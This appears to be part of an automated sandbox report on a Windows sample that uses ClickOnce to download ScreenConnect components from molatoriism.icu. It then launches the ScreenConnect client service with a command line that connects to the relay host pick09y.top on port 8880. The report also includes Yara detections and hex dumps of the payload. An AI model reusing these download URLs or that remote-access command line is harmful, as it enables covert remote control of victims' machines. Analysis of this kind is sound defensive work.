                                                                                                                                                                                                2024-11-07 16:56:11 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                                                2024-11-07 16:56:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.949840104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:12 UTC104OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:12 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:12 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V74StIO7eWxeERg9TnxEx52VEIlX0tNwwjcVV03JMUyFpVE10tqrbHbQAzo9RHqlZMnnyUESygLFTXGbmw6WjoSZs4IWjsY%2B1X4fJdk0p4%2BSl8%2B8gYh%2FOAwxFpQUpZACYE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedaf3ca99e813-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1480&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=719&delivery_rate=2016713&cwnd=251&unsent_bytes=0&cid=91160f7084002912&ts=747&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49851 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:56:14 UTC | 116 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                Connection: Keep-Alive
2024-11-07 16:56:14 UTC | 769 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:14 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHMif8ZkwU8rTyiEFqf5MFRoyznBhw455Ydi%2BusrGOcO71NeMl5g7grTKivEV5ofK2NEXmx6ZDP%2BQpszsZiMztffCqx2ynHYn0ELgq0g6DhRNUIZLfVJw4hrTqFEPNLYzIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedb00bd296c6b-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1214&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=707&delivery_rate=2322373&cwnd=234&unsent_bytes=0&cid=92ba6a810292f747&ts=592&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.9  49872        104.21.96.148   443               7480  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-07 16:56:17 UTC  123                OUT        GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-07 16:56:17 UTC  769                IN         HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 16:56:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcNGSogH6PtyNTdnHOhem1oTMwQwuGUMSEXeJeJXhBIkMcnYBSBQwQIBMnP4CZJPPEnKC0B5%2BNqUZKsEkovFXo32VWsSrxjFMrrB8upYan9UAtziqKo%2BibNmBFOTqVddgyM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deedb1719466b4b-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=714&delivery_rate=2337368&cwnd=251&unsent_bytes=0&cid=62c24d0c7e665eca&ts=304&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.9  49879        104.21.96.148   443               7480  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-07 16:56:18 UTC  93                 OUT        GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 16:56:19 UTC  771                IN         HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 16:56:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6MbaGBx7WTUeFeuvRYk7Az97ro85sl%2FF73%2FTdjdnpQDfEP7NBVFF0KjiaT1slAD8gkdzN82gNH%2F7iqMxwlfH0BpuEM2jP1z8HffvaOXrYcnZnGoGdl3UCh2Hh3BndTPoUVI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deedb1e5c292cde-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=708&delivery_rate=1777777&cwnd=251&unsent_bytes=0&cid=284a5b169de660b1&ts=642&x=0"
                                                                                                                                                                                                Data Ascii: (+(+(+(L-*bb0v"s(+}(N(OoPsQ(R&{iiX{{i(%{ii(%(S*J~4oT Zj*s*.~4oU*.~4oV*.~4oW*.~4
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 00 7e 5e 00 00 0a 18 17 16 8d db 00 00 01 28 1e 00 00 2b 2a 5a 02 6f 75 01 00 0a 2c 0c 02 6f 76 01 00 0a 6f 77 01 00 0a 2a 16 2a ce 02 28 71 01 00 06 2d 06 73 78 01 00 0a 7a 7e b0 00 00 04 25 2d 17 26 7e af 00 00 04 fe 06 fd 02 00 06 73 51 01 00 0a 25 80 b0 00 00 04 73 79 01 00 0a 2a 00 1b 30 03 00 93 00 00 00 25 00 00 11 28 0d 01 00 06 1b 17 73 6d 01 00 0a 28 7a 01 00 0a 2c 06 73 7b 01 00 0a 7a 28 bf 00 00 06 12 00 28 01 02 00 06 2d 06 73 78 01 00 0a 7a 06 7e a1 00 00 04 25 2d 13 26 14 fe 06 49 02 00 06 73 72 01 00 0a 25 80 a1 00 00 04 16 8d db 00 00 01 28 2d 00 00 06 0b 07 28 95 00 00 06 0c 08 28 3a 00 00 06 28 97 00 00 06 0d 02 6f 7c 01 00 0a 13 04 de 1e 09 2c 06 09 6f 11 00 00 0a dc 08 2c 06 08 6f 11 00 00 0a dc 07 2c 06 07 6f 11 00 00 0a dc 11 04 2a
                                                                                                                                                                                                Data Ascii: ~^(+*Zou,ovow**(q-sxz~%-&~sQ%sy*0%(sm(z,s{z((-sxz~%-&Isr%(-((:(o|,o,o,o*


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49900 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:56:23 UTC | 99 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 16:56:23 UTC | 798 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 16:56:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
CF-Cache-Status: BYPASS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOSQG4IThM9YQwIylo1x82%2BV5SrXsuOnqAcs8oAUlhOBfrB%2Bzr%2FAJPAK0KU5wg3CF2Nit5wlNE9InKvEcBvx%2BZh66DPDffRh04SC6IrJqWmUFcpqG%2FsQ%2BqLGcTqQInqXDA0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deedb390b043aaf-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1307&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=714&delivery_rate=2350649&cwnd=244&unsent_bytes=0&cid=3c421b81028212f5&ts=747&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49925 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:56:27 UTC | 114 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-07 16:56:27 UTC | 773 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 16:56:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7mcXIx0MOHCOQA37fmNSCcIvitKO9mGbe7Nx8L2CgQPtDJaznkrHlSKFJODTbCTQWc7xNE%2BmpZQQq9Z%2FK2FnIRGzXQ6Co1%2BmvKQ0hjRCFk1vQwhP6DhWnhKp7JcD%2F2KDjA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deedb53bc282e21-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1498&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=705&delivery_rate=2397350&cwnd=245&unsent_bytes=0&cid=054502f623a80752&ts=603&x=0"
                                                                                                                                                                                                Data Ascii: ooo-,o*'4Zs%}%}*>s%}*Zs%}%}*0,o+oXo-,o* 02o+ooXo-,o*
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 12 00 fe 15 8e 00 00 1b 02 6f c8 00 00 0a 0b 2b 12 07 6f c9 00 00 0a 0c 03 08 6f ca 00 00 0a 2c 02 08 0a 07 6f 11 00 00 0a 2d e6 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 0f 00 1e 2d 00 0a 00 00 00 00 1b 30 02 00 50 00 00 00 22 00 00 11 02 75 b3 00 00 1b 0b 07 2d 0c 02 75 27 00 00 01 0c 08 2d 09 2b 0e 07 6f c6 00 00 0a 2a 08 6f 04 01 00 0a 2a 16 0a 02 6f c8 00 00 0a 0d 2b 0b 09 6f c9 00 00 0a 26 06 17 58 0a 09 6f 11 00 00 0a 2d ed de 0a 09 2c 06 09 6f 10 00 00 0a dc 06 2a 01 10 00 00 02 00 2d 00 17 44 00 0a 00 00 00 00 1b 30 02 00 35 00 00 00 17 00 00 11 16 0a 02 6f c8 00 00 0a 0b 2b 14 07 6f c9 00 00 0a 0c 03 08 6f ca 00 00 0a 2c 04 06 17 58 0a 07 6f 11 00 00 0a 2d e4 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 00 00 00 01 10 00
                                                                                                                                                                                                Data Ascii: o+oo,o-,o*-0P"u-u'-+o*o*o+o&Xo-,o*-D05o+oo,Xo-,o*
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 1f 7d 6f 23 01 00 0a 26 06 6f 43 00 00 0a 2a d2 03 72 d0 03 00 70 6f 22 01 00 0a 26 03 02 28 31 01 00 06 6f 24 01 00 0a 26 03 72 06 04 00 70 6f 22 01 00 0a 26 03 02 28 33 01 00 06 6f 24 01 00 0a 26 17 2a 2e 02 03 28 39 01 00 06 16 fe 01 2a 26 0f 00 03 28 3c 01 00 06 2a a2 28 25 01 00 0a 02 7b 34 00 00 04 6f 26 01 00 0a 20 29 55 55 a5 5a 28 27 01 00 0a 02 7b 35 00 00 04 6f 28 01 00 0a 58 2a 5e 03 75 39 00 00 02 2c 0d 02 03 a5 39 00 00 02 28 3c 01 00 06 2a 16 2a c6 28 25 01 00 0a 02 7b 34 00 00 04 03 7b 34 00 00 04 6f 29 01 00 0a 2c 17 28 27 01 00 0a 02 7b 35 00 00 04 03 7b 35 00 00 04 6f 2a 01 00 0a 2a 16 2a 76 02 73 3c 00 00 0a 7d 36 00 00 04 02 28 3c 00 00 0a 02 28 10 00 00 2b 7d 39 00 00 04 2a aa 02 73 3c 00 00 0a 7d 36 00 00 04 02 28 3c 00 00 0a 02 03
                                                                                                                                                                                                Data Ascii: }o#&oC*rpo"&(1o$&rpo"&(3o$&*.(9*&(<*(%{4o& )UUZ('{5o(X*^u9,9(<**(%{4{4o),('{5{5o***vs<}6(<(+}9*s<}6(<
                                                                                                                                                                                                2024-11-07 16:56:28 UTC1369INData Raw: 16 28 1c 00 00 2b 28 1d 00 00 2b 28 1e 00 00 2b 28 1f 00 00 2b 2a 5a 7e 45 00 00 04 02 28 20 00 00 2b 28 21 00 00 2b 80 45 00 00 04 2a ae 73 8a 0d 00 06 25 02 7d 1a 05 00 04 25 03 7d 1b 05 00 04 25 04 7d 1c 05 00 04 fe 06 8b 0d 00 06 73 45 01 00 0a 28 63 01 00 06 2a 76 73 8c 0d 00 06 25 02 7d 1d 05 00 04 fe 06 8d 0d 00 06 73 45 01 00 0a 28 63 01 00 06 2a ae 73 8e 0d 00 06 25 02 7d 1e 05 00 04 25 03 7d 1f 05 00 04 25 04 7d 20 05 00 04 fe 06 8f 0d 00 06 73 45 01 00 0a 28 63 01 00 06 2a 5a 1f fe 73 90 0d 00 06 25 02 7d 25 05 00 04 25 03 7d 27 05 00 04 2a 13 30 03 00 2f 00 00 00 2d 00 00 11 73 86 0d 00 06 0a 06 02 7d 18 05 00 04 06 7b 18 05 00 04 6f 46 01 00 0a 28 c2 09 00 06 06 fe 06 87 0d 00 06 73 47 01 00 0a 28 22 00 00 2b 2a 00 13 30 03 00 45 00 00 00 2e
                                                                                                                                                                                                Data Ascii: (+(+(+(+*Z~E( +(!+E*s%}%}%}sE(c*vs%}sE(c*s%}%}%} sE(c*Zs%}%%}'*0/-s}{oF(sG("+*0E.



                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:11:55:49
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\pzPO97QouM.exe"
                                                                                                                                                                                                Imagebase:0x9c0000
                                                                                                                                                                                                File size:83'336 bytes
                                                                                                                                                                                                MD5 hash:47891CF8A43A19E066FE70E812982C98
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:11:55:49
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                Imagebase:0x1674c320000
                                                                                                                                                                                                File size:24'856 bytes
                                                                                                                                                                                                MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:11:55:49
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:11:55:50
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                                                                                                                                                                                                Imagebase:0x4f0000
                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:11:55:50
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756
                                                                                                                                                                                                Imagebase:0x4f0000
                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:11:55:50
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:11:55:52
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                Start time:11:56:31
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:11:56:31
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                Imagebase:0x440000
                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:11:56:32
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                Imagebase:0x440000
                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:11:56:33
                                                                                                                                                                                                Start date:07/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User"
                                                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:2.2%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:3.8%
                                                                                                                                                                                                  Total number of Nodes:1464
                                                                                                                                                                                                  Total number of Limit Nodes:4
